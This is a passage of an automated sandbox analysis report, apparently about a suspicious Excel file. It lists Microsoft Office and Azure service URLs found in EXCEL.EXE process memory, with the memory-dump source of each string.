      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://devnull.onenote.comt
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://directory.services.
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://enrichment.osi.office.net/
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
      Source: EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1AuthorizationBearer
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1&
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize$
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize%
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize(
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize)
      Source: EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize-N
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize0
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize1
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize2
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize3
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize4
      Source: EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize4Ii
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize5
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize6
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize7
      Source: EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize8
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize:
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize=
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize?
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeC&
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeF
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeI
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeK
      Source: EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeMBI_SSL_SHORT
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeN
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeR
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeT
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeX
      Source: EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizecom=YI
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorized
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizef
      Source: EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizehu
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizei
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeize
      Source: EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeizeKJ
      Source: EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeizeXJ
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizej
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizek
      Source: EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizekH
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizel
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizem
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizep
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeq
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizet
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeteB
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeu
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizev
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizew
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize~
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
      Source: EXCEL.EXE, 00000000.00000003.652673103.000000000E384000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1MBI_SSL_SHORT
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://management.azure.com
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://management.azure.com/
      Source: EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://management.azure.com/BingGeospatialEndpointServiceUrlhttps://dev.virtualearth.net/REST/V1/Ge
      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://management.azure.com/t
      Source: EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://messaging.office.com/
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://metadata.templates.cdn.office.net/client/logE
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
      Source: EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyBearer
      Source: EXCEL.EXE, 00000000.00000003.652989909.000000000F73B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935840425.000000000F729000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742471357.000000000F729000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.773711564.000000000F729000.00000004.00000001.sdmpString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyp
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechBearer
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechPeA
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652673103.000000000E384000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://ncus.contentsync.
      Source: EXCEL.EXE, 00000000.00000003.742853289.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660247505.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654236313.000000000E1DC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652925426.000000000E1DC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934591120.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652673103.000000000E384000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.778384283.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661726514.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.852724407.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652824432.000000000E1DC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655830251.000000000E1DC000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://ncus.pagecontentsync.
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com
      Source: EXCEL.EXE, 00000000.00000003.654090003.000000000E0EF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656225911.000000000E0EF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934378844.000000000E0EF000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/rules#
      Source: EXCEL.EXE, 00000000.00000003.654125752.000000000E12A000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/rules?Application=excel.exe&Version=16.0.4954.1000&ClientId=
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
      Source: EXCEL.EXE, 00000000.00000003.652673103.000000000E384000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecordhttps://login.windows.net/co
      Source: EXCEL.EXE, 00000000.00000003.652673103.000000000E384000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://o365auditrealtimeingestion.manage.office.comBearer
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/W
      Source: EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661956196.000000000F7E4000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://officeapps.live.com
      Source: EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com#
      Source: EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com.dll
      Source: EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com/
      Source: EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com9
      Source: EXCEL.EXE, 00000000.00000003.662023245.000000000F873000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comN
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comT
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comZ
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comb
      Source: EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comc
      Source: EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comdlll
      Source: EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comh
      Source: EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comq
      Source: EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.coms
      Source: EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.coms.dll
      Source: EXCEL.EXE, 00000000.00000002.934018559.000000000DA01000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comt8Jm$
      Source: EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comw
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks#dR
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
